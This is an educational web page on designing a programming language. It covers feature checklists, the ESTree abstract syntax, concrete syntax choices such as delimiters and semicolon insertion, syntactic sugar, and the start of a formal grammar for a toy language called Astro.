So, you want to design your own language? Of course you do. Or perhaps you are taking a class and are being forced to create a programming language under penalty of a bad grade. What kinds of things do you need to know?

Designing a Language

Of course you want to design (and implement!) your own programming language! It’s fun. It’s creative. It’s empowering.

How do we do it? In a nutshell, the process is iterative, cycling between four phases:

languagedesign.png

Doing the phases over and over is important; for example, while writing the compiler, you may be like “woah this is impossible” and then realize “oh shoot this part of the language wasn’t designed right!”

Prerequisites

It helps to be experienced. If you’re not, that’s okay, actually—you might get lucky!

But don’t mistake creativity for luck that shows up without pre-existing knowledge. The most creative people are those with a lot of knowledge and experience. So you should still study and practice!

Your success as a language designer will be massively aided by knowledge in three main areas:

  1. Programming Paradigms . You should know a number of different ways that computations can be structured. These include: imperative, declarative, structured, object-oriented, functional, applicative, concatenative, logic, protocol-oriented, aspect-oriented, array, event-driven, dataflow, agent-based, etc.

    See Wikipedia’s list of programming paradigms .

  2. Programming Language Concepts . You should have a good sense of most, if not all, of the following things: Sequencing, conditional execution, iteration, recursion, functional decomposition, modularity, synchronization, metaprogramming, binding, scope, extent, volatility, subtyping, pattern matching, type inference, closures, prototypes, introspection, instrumentation, annotations, decorators, memoization, traits, streams, monads, actors, mailboxes, comprehensions, continuations, wildcards, promises, regular expressions, proxies, transactional memory, inheritance, polymorphism, parameter modes, type classes, generics, reflection, concurrency, parallelism, distribution, persistence, transactions, garbage collection, and many more terms.

    I’m working on a glossary of such terms that may be helpful to review.

  3. Existing Programming Languages . It’s nice to have a feel for a variety of languages. Here are a few that are good to be familiar with (and the reasons why they are good to study):
    • Python , for basic imperative programming and scripting
    • Smalltalk , for OOP done beautifully
    • JavaScript , for event-driven features, async, and promises
    • Io , for ideas on building up everything from a minimal semantics
    • Julia , for multiple dispatch
    • Clojure , Racket , Scheme , and Common Lisp , for Lispiness (macros, etc.)
    • Standard ML , OCaml , F# , and Elm , for Hindley-Milner typing and more
    • Haskell , for typeclasses and functional purity
    • eToys , Scratch , Snap! , and GP for the blocks approach
    • Java and C# , for being enterprisey
    • Kotlin , Ceylon , and Scala , as examples of evolving Java
    • Erlang and Elixir , for expressing concurrent processes in a distributed fashion
    • Fortran , Chapel , and Parasail , for expressing multicore and parallel programming
    • PureScript , TypeScript , and ClojureScript , as examples of evolving JavaScript
    • C , because it is the quintessential systems language
    • C++ , Rust , Zig , and Odin for making systems programming less painful and more secure
    • Go and Swift , for more examples of modern, but generally mainline, ideas
    • J and K , for array programming
    • Idris , for dependent typing
    • Prolog and Mercury , for logic programming
    • Forth and Factor , for concatenative programming
    • Quipper , because it’s a language for quantum computing
    • Brainfuck , Malbolge , LOLCODE , Whitespace , and other classic esoterics
    • GolfScript , CJam , Pyth , Jelly , and other golfing languages, because this gives you a good sense of putting power into small syntactic constructs
    • Piet and Hexagony , for, well, check them out....

    Also check out this mini-encyclopedia of 70 languages .

    Here are some excellent cross-language comparisons that help you to hone your understanding of how different syntaxes can express the same ideas:

    These are really good too:

Getting Ready

Remember, many people have designed languages before you. They made mistakes. They came up with brilliant ideas. Many were wildly successful. Some never made it big. Some people have brought in years of research on how people think and learn to come up with principles for language (and environment) design.

You should learn from their experiences.

Study classic papers. Read web essays. Visit online courses. Here is a small sampling of things to study and places to look for more information:

Think about the future:

And understand that traditional, mainstream programming languages, are not at all the epitome of computational expression. Languages can be much more:

Getting Started

Ready to strike out on your own? Here are some things to think about, in the form of, you guessed it, a checklist:

  • Do you have a specific audience in mind? Artists? Graphic designers? AI researchers? Numeric and Scientific nerds? Natural language types? Game developers? Machine learning people? Animators? High performance folks? System programmers? Or do you want a general purpose language? Or do you just want to do what you want?
  • Understand the audience that the language is designed for, and what kinds of things they want to create with it (or problems they want to solve with it).
  • Determine if your language is to be (1) a reasonable, usable language or (2) an esoteric/joke/golfing language.
  • Determine if it is to be pragmatic, idealistic, researchy, or evil.
  • Determine whether you want your language firmly in one camp—OO, functional, logic, concatenative, plain-imperative—or be a multiparadigm symphony. Or a multiparadigm cacophony.
  • Determine whether it is to be built on a single characteristic building block (a crystallization of style ) or one with a huge variety of syntactic forms for multiple semantic aspects (an agglutination of features ).
  • Determine your concurrency model. Do you want all your programs to be single-threaded and sequential? Or are you looking for something event-driven and async? Or multithreaded? Or distributed?

Choosing a Starter Set of Features

Come up with a list of capabilities, or features. Make sure they enable programmers to express their creations by following the suggestions and principles in the Learnable Programming essay, including:

  • Make meaning transparent
  • Explain in context
  • Make flow and time tangible and visible
  • Show the data, and avoid hidden state
  • Use metaphor
  • Allow easy decomposition and recomposition
  • Allow the programmer to write readable code—you do support mentioning parameter names in calls, right?

Exercise : Skim the Learnable Programming essay. Or, better, read the whole thing if/when you have time.

What kind of questions might you have here? Here are some totally random ideas:

  • If your language supports functions:
    • Must you pass the exact number of arguments the function expects?
    • Can you specify parameter names in the call?
    • Do you have rest parameters? optional parameters? keyword parameters? default parameters?
    • Are the parameters typed?
    • Can parameters be modified? Are they passed by value, value-result, reference, name, etc?
    • Are arguments evaluated L-R, R-L, in parallel, or in arbitrary order?
    • How does a function return a value? Can it return zero or more values or just one?
    • Are functions first-class? If so, do you use deep binding or shallow binding?
    • Is recursion allowed?
    • Can you test functions for equality?
    • Can functions be anonymous?
  • What is your type system like?
    • Static vs. dynamic, strong vs. weak, manifest vs. implicit?
    • Do you distinguish primitive types from reference types?
    • Do you have all those different numeric types based on bit size? What about decimals and ratios?
    • Do you have a separate character type? A separate boolean type?
    • Can you get the type of an expression at runtime?
    • Are types objects?
    • Do you have supertypes and subtypes? Multiple-inheritance? If so, how do you handle name collisions?
    • Are types the same as classes? Can you add new types?
    • Do you have both sum and product types?
    • Do functions have a type?
    • Are there pointer types?
    • Are there parameterized types? If so, are they (mostly) covariant, contravariant, or invariant?
    • Any dependent types?
  • What do your expressions look like?
    • And does your runtime follow eager or lazy evaluation? Or both?
    • Do you have only prefix, only postfix, only infix, or a wild mix of operators?
    • Can you overload operators? If so, how?
    • Can you change the precedence of operators? Even the built-in ones? At runtime?
    • How much type inference do you have?
    • Can you mark variables as mutable or immutable?
    • Are your variables bound or assigned? Can they be assigned more than once?
    • Do you have destructuring and/or pattern matching?
    • How do you determine scope? Do you implicitly or explicitly import into inner scopes?
    • Are there keywords that define access like public , private , and protected , or are there conventions, like in Go, where capitalized entities are implicitly exportable and lower-cased entities are private?
    • Is there a let -expression for super-local scopes?
    • Is shadowing allowed?
    • Do you have anything like JavaScript’s this expression?
  • How do you express control flow?
    • Do you like expression-orientation or do you have real statements?
    • How do you express sequential flow vs. nondeterministic flow vs. parallel flow?
    • If you have nondeterminism, how do you ensure fairness?
    • Must guards in a multiway selection be executed in any particular order?
    • Do you have short-circuit operators? Iterator objects? Generators?
    • Do you have all the loops: (1) forever, (2) n times, (3) while/until a condition, (4) through a numeric range (with an optional step size), or (5) through a collection?
    • Do you have break and continue ? Anything like Ruby’s retry and redo ?
    • Do you have exceptions? Or do you need Go-style constructs? Or do you have nullables everywhere?
    • Do you have a timer for sleeping, delaying execution, or running on intervals?
    • Can I haz goto ?
  • How do you support concurrency?
    • Threads, or events?
    • Shared memory only? Message passing only? Or both? If shared memory, is it mutable? If so, do you have locks, higher-level synchronization devices, or some kind of transactional memory?
    • Do you support different levels of granularity of concurrency?
    • Are tasks spawned implicitly when their enclosing block begins, or do they require explicit invocation?
    • Do tasks die when the enclosing block or spawning task terminates? Or does the spawner wait for all internal tasks to terminate?
    • Do tasks know who started them?
    • If an asynchronous task is launched, how is a result obtained? Callback, promise, or some other mechanism?
    • Is message passing done via named channels, named processes, or bulletin board?
    • Is message passing always synchronous, asynchronous, or both?
    • Are there timed or conditional synchronization mechanisms?
    • Can tasks detect their own state?
  • How meta are you?
    • Can a program get a list of its global variables, loaded classes, top-level functions, etc.? Can a class get a list of its fields, methods, constructors, superclass(es), subclasses, etc.? Can a function get its parameters, locals, return types, etc.?
    • Can a function find out who called it?
    • Can a variable be read or set via its name (a string) only? Can a function or method be invoked by its name (a string) only? Can new variables or types or functions be created at run time, given only their name and some indication of how they should look?
    • Does the language have a macro system? If so, is it string-based or AST-based?
    • Is it possible to unquote within a macro?
    • Are macros hygienic? What syntactic devices are provided to explicitly capture in-scope variables, if any?
What did I just read?

Feeling like only about 20% of the questions above made any sense? Feeling like that vocabulary came out of nowhere? That’s fine for now. Learning about programming languages can be a never-ending lifelong journey, but you can use the questions you don’t quite understand now as a place to start some research.

Oh, I have a glossary you might find helpful.

From Features To Abstract Syntax

When you have a good idea of your language features, you’ll want to figure out a good way to organize them, structurally. This is known as your language’s abstract syntax . In an abstract syntax we don’t worry much about punctuation and parentheses and such microscopic details. We are interested in the overall structure. Here’s a look at abstract syntax trees in JavaScript:

When defining your language, you will want to specify exactly what the AST Nodes are, how they are related to each other, and what their properties are. For JavaScript, the AST Node types come from a specification called EsTree . I've summarized the main interfaces here:

Program sourceType:["script"|"module"] body:[Statement|ModuleDeclaration]
Statement
    Declaration
        FunctionDeclaration(Function) id:Identifier
        VariableDeclaration declarations:[VariableDeclarator] kind:("var"|"let"|"const")
        ClassDeclaration(Class) id:Identifier
    EmptyStatement
    DebuggerStatement
    ExpressionStatement expression:Expression
    BlockStatement body:[Statement]
    ReturnStatement argument:Expression?
    LabeledStatement label:Identifier body:Statement
    BreakStatement label:Identifier?
    ContinueStatement label:Identifier?
    IfStatement test:Expression consequent:Statement alternate:Statement?
    SwitchStatement discriminant:Expression cases:[SwitchCase]
    WhileStatement test:Expression body:Statement
    DoWhileStatement body:Statement test:Expression
    ForStatement init:(VariableDeclaration|Expression)? test:Expression? update:Expression? body:Statement
    ForInStatement left:(VariableDeclaration|Pattern) right:Expression body:Statement
        ForOfStatement await:boolean
    ThrowStatement argument:Expression
    TryStatement block:BlockStatement handler:CatchClause? finalizer:BlockStatement?
    WithStatement object:Expression body:Statement
Function id:Identifier? params:[Pattern] body:BlockStatement generator:bool async:bool
VariableDeclarator id:Pattern init:Expression?
SwitchCase test:Expression? consequent:[Statement]
CatchClause param:(Pattern?) body:BlockStatement
Expression
    ThisExpression
    Identifier(Pattern) name:string
    Literal value:(string|bool|number|Regexp|bigint)?
        RegExpLiteral regex:{pattern:string flags:string}
        BigIntLiteral bigint:string
    ArrayExpression elements:[(Expression|SpreadElement)?]
    ObjectExpression properties:[Property|SpreadElement]
    FunctionExpression(Function)
    ArrowFunctionExpression(Function) body:(BlockStatement|Expression) expression:bool
    UnaryExpression operator:UnaryOperator prefix:bool argument:Expression
    UpdateExpression operator:UpdateOperator argument:Expression prefix:bool
    BinaryExpression operator:BinaryOperator left:Expression right:Expression
    AssignmentExpression operator:AssignmentOperator left:Pattern right:Expression
    LogicalExpression operator:LogicalOperator left:Expression right:Expression
    MemberExpression(ChainElement) object:(Expression|Super) property:Expression computed:bool
    ChainExpression expression:ChainElement 
    ConditionalExpression test:Expression consequent:Expression alternate:Expression
    CallExpression(ChainElement) callee:(Expression|Super) arguments:[(Expression|SpreadElement)]
    YieldExpression argument:Expression? delegate:bool
    TemplateLiteral quasis:[TemplateElement] expressions:[Expression]
    TaggedTemplateExpression tag:Expression quasi:TemplateLiteral
    NewExpression
    SequenceExpression expressions:[Expression]
    ClassExpression(Class)
    AwaitExpression argument:Expression
    ImportExpression source:Expression
    MetaProperty meta:Identifier property:Identifier
Class id:Identifier? superClass:Expression? body:ClassBody
ClassBody body:[MethodDefinition]
MethodDefinition key:Expression value:FunctionExpression kind:("constructor"|"method"|"get"|"set") computed:bool static:bool
SpreadElement argument:Expression
Property key:Expression value:Expression kind:("init"|"get"|"set") method:bool shorthand:bool computed:bool
    AssignmentProperty value:Pattern kind:"init" method:false
Pattern
    ObjectPattern properties:[AssignmentProperty|RestElement]
    ArrayPattern elements:[Pattern?]
    RestElement argument:Pattern
    AssignmentPattern left:Pattern right:Expression
Super
TemplateElement tail:boolean value:{cooked:string? raw:string}
ChainElement optional:boolean
enum UnaryOperator {"-"|"+"|"!"|"~"|"typeof"|"void"|"delete"}
enum UpdateOperator {"++"|"--"}
enum BinaryOperator {"=="|"!="|"==="|"!=="|"<"|"<="|">"|">="|"<<"|">>"|">>>"|"+"|"-"|"*"|"/"|"%"|"**"|"|"|"^"|"&"|"in"|"instanceof"}
enum AssignmentOperator {"="|"+="|"-="|"*="|"/="|"%="|"**="|"<<="|">>="|">>>="|"|="|"^="|"&="}
enum LogicalOperator {"||"|"&&"|"??"}
ModuleDeclaration
    ImportDeclaration specifiers:[ImportSpecifier|ImportDefaultSpecifier|ImportNamespaceSpecifier] source:Literal
    ExportNamedDeclaration declaration:Declaration? specifiers:[ExportSpecifier] source:Literal?
    ExportDefaultDeclaration declaration:(Declaration|Expression)
    ExportAllDeclaration source:Literal exported:(Identifier?)
ModuleSpecifier local:Identifier
    ImportSpecifier imported:Identifier
    ImportDefaultSpecifier
    ImportNamespaceSpecifier
    ExportSpecifier exported:Identifier

I’ve built an interactive application for you to explore AST generation. Please try it out!

Exercise : Please try it out.

Too much detail?

You may notice that the EsTree specification has a lot more detail than the hand-drawn ASTs in the video above. This is okay. The specification is used to build actual compilers and interpreters, while for hand-drawn ASTs we just like to give the big picture and can take some “shortcuts.”

From Abstract Syntax to Concrete Syntax

Now it’s time to think about what your language will really look like! Remember that design is creative and iterative, so you will want to begin, like all artists do, with sketches:

  • Sketch programs or program fragments in your language.
  • Sketch fragments that are not in your language.
  • Come up with a nice, consistent, syntactic theme.

Do a lot of experimentation here! You will probably want to put creative effort into designing a language that people will like to use. What kinds of syntax issues will you have to deal with? Dozens, actually, and we can’t cover them all, but we can take a taste of a few that tend to generate strong opinions.

Overall Phrase Structure

You will need to adopt a scheme for showing structure. The popular approaches are: Curly-brace (JavaScript, Java, C++, C#), Terminal-end (Ruby, Ada), Nested parentheses (Lisp, Clojure, Racket), Indentation (Python), Blocks (EToys, Scratch, Snap!), Pictures (Piet), Other (Haskell, Erlang, Prolog).

The important idea here is that a single abstract syntax can be realized with many different concrete syntaxes . A concrete syntax specifies exactly which strings of characters make up structurally valid programs. For example, the AST:

little-ast.png

represents each of the following (and more!):

while y - 5 == 3:
    print(x * (3 + y))
while y - 5 == 3 {
  print(x * (3 + y))
}
while y - 5 == 3 loop
  print(x * (3 + y))
end
(while (= (- y 5) 3)
    (print (* x (+ 3 y))))

Exercise : The last syntax is used in Clojure, Lisp, Scheme and others. Note that in some ways, this IS the abstract syntax. How so?
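
By the way, the shared tree itself can be written down directly as data. Here is a rough sketch in JavaScript, using node shapes modeled on the ESTree summary from earlier (treating print as an ordinary call is an assumption here, since none of the example languages above is actually JavaScript):

// A sketch of the AST above as a JavaScript object, ESTree-style.
const ast = {
  type: "WhileStatement",
  test: {
    type: "BinaryExpression", operator: "==",
    left: {
      type: "BinaryExpression", operator: "-",
      left: { type: "Identifier", name: "y" },
      right: { type: "Literal", value: 5 },
    },
    right: { type: "Literal", value: 3 },
  },
  body: {
    type: "ExpressionStatement",
    expression: {
      type: "CallExpression",
      callee: { type: "Identifier", name: "print" },
      arguments: [{
        type: "BinaryExpression", operator: "*",
        left: { type: "Identifier", name: "x" },
        right: {
          type: "BinaryExpression", operator: "+",
          left: { type: "Literal", value: 3 },
          right: { type: "Identifier", name: "y" },
        },
      }],
    },
  },
};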

Exercise : Here is another: y 5 - 3 == [x 3 y + * print] while . Do you know of, or can you find, any languages which have that kind of syntax?

In addition to structure, your choice of keywords, operators, and punctuation (or lack thereof) is part of your design. Here’s an abstract syntax:

ikiast.png

Let’s try out a few things:

program:
    var x, y: integer
    while y - 5 == 3:
        var y: integer
        get(x)
        get(y)
        x = 2 * (3 + y)
    put(5)
int x, y;
while y - 5 = 3 {
    int y;
    STDIN -> x;
    STDIN -> y;
    x <- 2 * (3 + y);
}
STDOUT <- 5;
COMMENT THIS LOOKS LIKE OLD CODE
DECLARE INT X.
DECLARE INT Y.
WHILE DIFFERENCE OF Y AND 5 IS 3 LOOP:
    DECLARE INT Y.
    READ FROM STDIN INTO X.
    READ FROM STDIN INTO Y.
    MOVE PRODUCT OF 2 AND (SUM OF 3 AND Y) INTO X.
END LOOP.
WRITE 5 TO STDOUT.
(program
  (declare x int)
  (declare y int)
  (while (= (- y 5) 3)
    (define (y int))
    (read x y)
    (assign x (* 2 (+ 3 y)))
  )
  (write 5)
)

Exercise : Play around and sketch a few more.

Delimiters

How to separate one construct from another is a really big issue in syntax design, believe it or not. We can identify two main classes of languages: those in which newlines are significant and those in which they are not.

“Insignificant” Newlines

In many languages, newlines are just like any other whitespace character (except for minor exceptions such as single-line comments and single-line string literals). Then, unless you have an S-Expression-based syntax as in Lisp, Scheme, and Clojure, you’ll need semicolons to terminate (or separate) statements. This means you can (but shouldn’t) write code like:

#define ZERO 0
    unsigned  gcd(   unsigned   int  // Euclid's algorithm
      x,unsigned   y) {   while ( /* hello */  x>   ZERO
   ){unsigned temp=x;x=y   %x;y  = temp ;}return

   y ;}

“Significant” Newlines

Where you place your newlines matters greatly in, let’s see, Assembly languages, Python, Ruby, JavaScript, Elm, Haskell, Go, Swift, and yes, many others. The rules can get pretty technical.

Python scripts are defined as sequences of logical lines , delimited by the token NEWLINE. A statement may not cross logical lines, except in the case of compound statements in which each constituent simple statement ends with a NEWLINE. Logical lines are made up of one or more physical lines according to line joining rules. Lines are implicitly joined within parentheses, brackets, or braces; lines can be explicitly joined by ending with a backslash. Comments and string literals get their own special treatment in these rules.

Ruby looks at the end of each line and says “well, if up to here it looks like we’ve completed a statement, then we have.” This means you have to be careful where you break lines:

puts 5
  + 3
puts 5 +
  3

prints 5 then 8.

Exercise : Why?

“Possibly Significant” Newlines

JavaScript requires most statements to be terminated by semicolons, but the compiler will put one in for you if it looks like you might have missed one . The rules by which this automatic semicolon insertion (ASI) is done have to be learned and they might be hard to remember.

[God creating JavaScript]
GOD: It uses prototype-based inheritance.
Angel: Nice.
GOD: Also it secretly adds semicolons to ur code.
A: wat

— Neckbeard Hacker (@NeckbeardHacker) August 24, 2016

If you are going to be a serious JavaScript programmer, you need to learn the rules of ASI, whether you choose to use semicolons or not .
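
Here is the classic pitfall, shown as a small sketch (this is standard JavaScript behavior: a line break right after return triggers semicolon insertion):

// ASI inserts a semicolon right after "return", so the function returns
// undefined and the expression on the next line is never reached.
function area(r) {
  return
    Math.PI * r * r;
}
console.log(area(2));        // undefined, not 12.566...

// Keeping the expression on the same line as "return" avoids the problem.
function area2(r) {
  return Math.PI * r * r;
}
console.log(area2(2));       // 12.566370614359172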

Exercise : Research the famous Rules of Automatic Semicolon Insertion . Which statements are supposed to be terminated by a semicolon? When is a semicolon inserted? Give four examples of how writing JavaScript in a "free-form" manner is impossible because of semicolon insertion.

Some people feel very strongly about whether or not to use semicolons:

zzzzing.png

Function Calls

Most programming languages have functions. Seriously. But there are a lot of ways to work them into your design. Basic questions include: Must functions have exactly one argument, or zero or more arguments? Parens or no parens? Positional or keyword arguments? Argument labels? If no arguments, can we omit parentheses?

You can play around and see what you can come up with:

  • push(myStack, 55)
  • push myStack 55
  • [push myStack 55]
  • (push myStack 55)
  • push(on: myStack, theValue: 55)
  • push(theValue: 55, on: myStack)
  • push on:myStack theValue:55
  • push({ on: myStack, theValue: 55 })
  • push { on: myStack, theValue: 55 }
  • push({ theValue: 55, on: myStack })

You might want to consider an ultra-low precedence function application, like they have in Haskell and F#:

  • sum (filter even (map square a))
  • sum $ filter even $ map square $ a
  • sum <| filter even <| map square <| a
  • a |> filter even |> map square |> sum

The flip side of function calls is function definitions. You’re likely familiar with default parameters, and rest parameters. Python has cool mechanisms for requiring arguments to be positional or keyword, based on the definition. Examples:

  • def sqrt(x, /)
  • def line(*, x1, x2, y1, y2, width, style, color)
  • def f(a, b, /, c, d, *, e, f)
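
JavaScript, for what it’s worth, has no keyword parameters at all, yet the object-literal call styles sketched above (push({ on: myStack, theValue: 55 })) are easy to simulate with destructuring. A small sketch, with a made-up push function and stack representation:

// Simulating keyword arguments with a destructured object parameter.
// The names "push", "on", and "theValue" are invented for illustration.
function push({ on: stack, theValue: value }) {
  stack.items.push(value);
}

const myStack = { items: [] };
push({ on: myStack, theValue: 55 });
push({ theValue: 56, on: myStack });   // "keyword" order does not matter
console.log(myStack.items);            // [ 55, 56 ]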

Syntactic Sugar

Syntactic sugar refers to forms in a language that make certain things easier to express, but can be considered surface translations of more basic forms.

This is best understood by example. There are zillions of examples out there. Here are a few. ( Disclaimer : Some of these are just examples I made up and are not part of any real language.)

  • x += n desugars to x = x + n (compound assignment)
  • a + b desugars to operator+(a, b) or "+"(a, b) or __add__(a, b) (common in languages that allow operator overloading)
  • a[i] desugars to *(a + i) (C, C++ pointer arithmetic; and i[a] works too!)
  • p -> x desugars to (*p).x (C, C++: field of the struct being pointed to)
  • f desugars to f() (some languages let you leave off parentheses in calls with no arguments)
  • f x desugars to f(x) or x.f() (some languages let you leave off parentheses in calls with one argument)
  • x op y desugars to op(x, y) or x.op(y) (some languages let you leave off parentheses in calls with two arguments)
  • let x=E1 in E2 desugars to (x => E2)(E1) (let-expression, in functional languages)
  • (E1 ; E2) desugars to (() => E2)(E1) (expression sequencing, in eager functional languages)
  • r = [s for x in a if e] desugars to r = []; for x in a: if e: r.add(s) (list comprehension)
  • x orelse y desugars to if x then x else y (Standard ML short-circuit disjunction)
  • x andalso y desugars to if x then y else x (Standard ML short-circuit conjunction)
  • [x, y, z] desugars to x :: y :: z :: nil (lists in Standard ML)
  • "a${x}b" desugars to "a" + x + "b" (string interpolation)

Exercise : Find some more examples.

When the sugared form is completely gratuitous or actually makes the code less readable, you sometimes hear the term syntactic syrup or syntactic saccharin .

Syntactic Salt

Here’s the definition from The New Hacker’s Dictionary :

The opposite of syntactic sugar, a feature designed to make it harder to write bad code. Specifically, syntactic salt is a hoop the programmer must jump through just to prove that he knows what’s going on, rather than to express a program action. Some programmers consider required type declarations to be syntactic salt. A requirement to write “ end if ”, “ end while ”, “ end do ”, etc. to terminate the last block controlled by a control construct (as opposed to just “ end ”) would definitely be syntactic salt. Syntactic salt is like the real thing in that it tends to raise hackers’ blood pressures in an unhealthy way.

Candygrammars

Some people love verbose code, because explicit is better than implicit. But if you are a language designer, be pragmatic: there is such a thing as code that is too verbose. What about trying to make the code read like human language? Here’s an example in Hypertalk (taken from Wikipedia):

on mouseDown
  answer file "Please select a text file to open."
  if it is empty then exit mouseDown
  put it into filePath
  if there is a file filePath then
    open file filePath
    read from file filePath until return
    put it into cd fld "some field"
    close file filePath
    set the textStyle of character 1 to 10 of card field "some field" to bold
  end if
end mouseDown

And here’s an example from a language that some students developed, and regretted:

to get the truth value prime of whole number n:
    return no if n < 2
    for each d in 3 to n - 1 by 2:
        return no if d divides n
    end
    return yes
end
for each k in 1 to 100:
    write k if prime(k)
end

In practice this kind of verbosity is worse than it sounds. Here’s what the New Hacker’s Dictionary has to say about this:

candygrammar /n./ A programming-language grammar that is mostly syntactic sugar; the term is also a play on “candygram.” COBOL, Apple’s Hypertalk language, and a lot of the so-called “4GL” database languages share this property. The usual intent of such designs is that they be as English-like as possible, on the theory that they will then be easier for unskilled people to program. This intention comes to grief on the reality that syntax isn’t what makes programming hard; it’s the mental effort and organization required to specify an algorithm precisely that costs. Thus the invariable result is that candygrammar languages are just as difficult to program in as terser ones, and far more painful for the experienced hacker.

[The overtones from the old Chevy Chase skit on Saturday Night Live should not be overlooked. This was a "Jaws" parody. Someone lurking outside an apartment door tries all kinds of bogus ways to get the occupant to open up, while ominous music plays in the background. The last attempt is a half-hearted "Candygram!" When the door is opened, a shark bursts in and chomps the poor occupant. There is a moral here for those attracted to candygrammars.]

Terseness

Some languages pride themselves on doing a whole lot with few characters:

An example from Ruby (do you see what this does?):

c = Hash.new 0
ARGF.each {|l| l.scan(/[A-Z']+/i).map {|w| c[w.downcase] += 1}}
c.keys.sort.each {|w| puts "#{w}, #{c[w]}"}

An example from APL (The 99 bottles of beer program taken from Rosetta Code):

bob  ←  { (⍕⍵), ' bottle', (1=⍵)↓'s of beer'}
bobw ←  {(bob ⍵) , ' on the wall'}
beer ←  { (bobw ⍵) , ', ', (bob ⍵) , '; take one down and pass it around, ', bobw ⍵-1}
↑beer¨ ⌽(1-⎕IO)+⍳99

Here’s APL again, with an expression to find all the prime numbers up to R:

(~R∊R∘.×R)/R←1↓⍳R

Some people love terse, concise code, because it says only what it needs to and reduces cognitive load, leaving you with less noisy syntax to learn. But if you are a language designer, be pragmatic: there is such a thing as code that is too terse. Unless...that’s your goal....

Golfing Languages

Golfing languages take terseness to the next level. A golfing language is a kind of esoteric programming language (a non-practical language created to experiment with weird ideas, be hard to program in, or be humorous) that allows programs to be written in an insanely small number of characters (or bytes).

Here are some CJam programs:

  • "Hello, world!"
  • 5{"Hello, world"oNo}*
  • 0X{_2$+}A*]N*
  • l~@-@@-mh
  • 1{_B<}{_'**N+o)}w;

Here are some Pyth programs (taken from the documentation):

  • "Hello, world!
  • FNrZhTN
  • FNUhTN
  • VhTN
  • K1FNr1hQ=K*KN;K
  • .!Q
  • WtQ=Q?%Q2h*Q3/Q2Q
  • A(Z1;VhhTGA(H+GH

Exercise : Find a bunch more examples of CJam and Pyth programs. Try them out. You can run them both at TIO . For Pyth, there’s also a hosted interpreter with a Cheat Sheet .

Exercise : Try out Stax .

Defining Your Language

Traditionally, real world language definitions come in three main flavors:

  • An official document, with a mix of formal notation and informal descriptions (Very common)
  • An official document, with 100% of the definition specified in a formal notation (Very rare)
  • A “reference implementation,” namely a compiler or interpreter, so that the language “definition” is simply “whatever this program does” (Typical for some scripting languages). An advantage of this approach is that there are never any compiler bugs!

Exercise : Why exactly is a reference implementation compiler by definition bug-free? If being bug-free is so great, why don’t all languages do this? What are the downsides?

An official definition will have three parts:

  • Syntax (Structure): What are the structural entities (e.g., declarations, expressions, statements, modules) and how do they fit together, perhaps with punctuation?
  • Semantics (Meaning), Statics: What are the non-structural rules that define a legal program (e.g., type checks, argument-parameter matching rules, visibility rules, etc.)?
  • Semantics (Meaning), Dynamics: What does a program do? What effects do each of the forms of a well-structured, legal program have on the run-time environment?

Why are there three parts instead of two (i.e., just syntax and semantics)? Here’s why. While everyone might agree that the following is structurally malformed:

#<include > stdio.h
main() int }
    printf["Hello, world!\n");]
{

the following program looks good in terms of “structure” but it’s actually meaningless since it violates a contextual rule that says identifiers must be declared before use:

int main() {
    printf("%d\n", x);
}

We say the latter program has static semantic errors because they can be detected by a compiler before the program is ever run. This is in contrast to a dynamic semantic error, which can only be detected at run time.

Example : You’ve probably heard the distinction between “static” and “dynamic” before. Perhaps you know that “static typing” means type checking is done prior to program execution and “dynamic typing” means checking is done during program execution. Most languages do a little of both, but one or the other usually predominates. Sometimes you get a good deal of both: in TypeScript, for example, you have a set of static types which is much larger than, and completely different from, the eight dynamic types. Fun.
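
JavaScript itself gives a feel for the static/dynamic split, even without a type checker. A small sketch:

// A static error: redeclaring a let-bound name in the same scope is rejected
// before any code runs, even though the offending block is unreachable.
// (Shown in a comment so this file still loads.)
//
//   if (false) { let x = 1; let x = 2; }   // SyntaxError at load time
//
// A dynamic error: calling a non-function is only detected when the call
// actually executes.
let f = 42;
try {
  f();                                     // TypeError: f is not a function
} catch (e) {
  console.log(e instanceof TypeError);     // true
}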

Defining the Syntax

Let’s see how we would formally specify the syntax for the simple language Astro . Assume we’ve gone through the first two design phases, and we’ve sketched out a program that shows all the features:

// A simple program in Astro

radius = 55.2 * (-cos(2.8E-20) + 89) % 21;    // assignment statement
the_area = π * radius ** 2;                   // a built-in identifier
print hypot(2.28, 3 - radius) / the_area;     // print statement

Next, we put our ideas into words. A first pass: “Programs are structured as a sequence of one or more statements, each of which is an assignment or print statement, with expressions formed with numbers, variables, function calls, and the usual arithmetic operators, which can have parentheses when needed. Comments look like the slash-slash comments of C-like languages.”

Natural language isn’t super precise, so let’s try to tighten this up. Let’s get started defining programs, statements, and expressions:

Program     = Statement+
Statement   = id "=" Exp ";"
            | print Exp ";"
Exp         = numeral
            | id
            | id "(" (Exp ("," Exp)*)? ")" 
            | "-" Exp
            | Exp ("+" | "-" | "*" | "/" | "%" | "**") Exp
            | "(" Exp ")"

An identifier is the computer science word for a name you attach to an entity (a variable, constant, function, type, parameter, or similar thing). Let’s decree that Astro identifiers begin with a letter, and can have letters, digits, and underscores (examples: x , last_attempt , p1 , p2 , overTheLimit , bot8675309_jEnNy ). We will call letters, digits, and underscores identifier characters (idchars). But let’s also decree that print is not allowed to be an identifier (so we don’t confuse people)!

This means we have to define the print keyword very carefully. It’s not just the five letters p, r, i, n, and t. If it were then the program:

    printy;

would be legal! It would be the five characters spelling print followed by a legal expression, namely the identifier y . We want the word print to not bleed into any following characters that might be part of an expression. In other words, print must not be immediately followed by an identifier character. And, we have to explicitly exclude print from our category of identifiers. Both things are necessary. Let’s use the ~ symbol in our notation to exclude things:

print       = "print" ~idchar
idchar      = letter | digit | "_"
id          = ~print letter idchar*

Exercise : Make sure you understand how this definition ensures that “printy” is an identifier and not print followed by the identifier y .

Now time for numerals. We’ll keep things in decimal only (no worries about hex or binary), and use the times-ten-to-the notation from popular programming languages:

numeral     = digit+ ("." digit+)? (("E" | "e") ("+" | "-")? digit+)?
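
As a sanity check, the numeral rule corresponds to a regular expression you could poke at in JavaScript (a sketch; the grammar rule above remains the source of truth):

// The numeral rule as a JavaScript regular expression.
const numeral = /^\d+(\.\d+)?([Ee][+-]?\d+)?$/;
console.log(numeral.test("55.2"));       // true
console.log(numeral.test("2.8E-20"));    // true
console.log(numeral.test(".5"));         // false: a leading digit is required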

Looking good. But what about things like letter and digit ? Should we define these? Nah, let’s say that in our definition schema these things are built-in. Let’s in fact “build in” all of the following:

  • letter , for any Unicode letter
  • digit , for "0".."9"
  • alnum , for letter | digit
  • upper , for any Unicode uppercase letter
  • lower , for any Unicode lowercase letter
  • hexDigit , for digit | "a".."f" | "A".."F"
  • any , for any Unicode character at all

